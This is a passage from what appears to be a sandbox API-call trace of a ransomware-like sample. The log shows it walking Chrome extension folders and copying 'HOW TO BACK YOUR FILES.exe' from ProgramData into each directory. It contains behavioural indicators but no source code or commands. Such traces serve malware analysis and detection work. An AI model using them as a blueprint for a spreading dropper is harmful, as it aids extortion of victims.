lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.874] CloseHandle (hObject=0x120) returned 1 [0104.874] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.874] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8340ffa0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d7d7960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d7d7960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.874] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.874] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.874] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn" [0104.875] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn" [0104.875] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.875] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.875] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.876] GetLastError () returned 0x0 [0104.876] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.876] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.876] CloseHandle (hObject=0x120) returned 1 [0104.876] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.876] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8340b180, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d7fdac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d7fdac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.876] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.876] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.876] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg" [0104.876] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg" [0104.876] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.876] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.877] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.877] GetLastError () returned 0x0 [0104.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.877] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.878] CloseHandle (hObject=0x120) returned 1 [0104.878] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.878] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bg\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83403c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d7fdac0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d7fdac0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.878] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.878] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.878] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar" [0104.878] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar" [0104.878] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.878] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.879] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.879] GetLastError () returned 0x0 [0104.879] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.879] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.879] CloseHandle (hObject=0x120) returned 1 [0104.880] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.880] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ar\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x833f7900, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d823c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d823c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.880] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.880] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.880] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am" [0104.880] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am" [0104.880] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.880] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.881] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.881] GetLastError () returned 0x0 [0104.881] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.881] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.881] CloseHandle (hObject=0x120) returned 1 [0104.881] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.881] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\am\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x833e8ea0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d823c20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d823c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.881] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.882] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.882] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details" [0104.882] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details" [0104.882] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.882] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.883] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.883] GetLastError () returned 0x0 [0104.883] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.883] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.883] CloseHandle (hObject=0x120) returned 1 [0104.883] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.883] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cloud_route_details\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8368d2f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d849d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d849d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.883] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.883] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.884] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup" [0104.884] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup" [0104.884] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.884] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.884] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.885] GetLastError () returned 0x0 [0104.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.885] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.885] CloseHandle (hObject=0x120) returned 1 [0104.885] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.885] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83663ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d8e2300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d8e2300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.885] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.885] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.885] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia" [0104.885] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia" [0104.886] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.886] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User 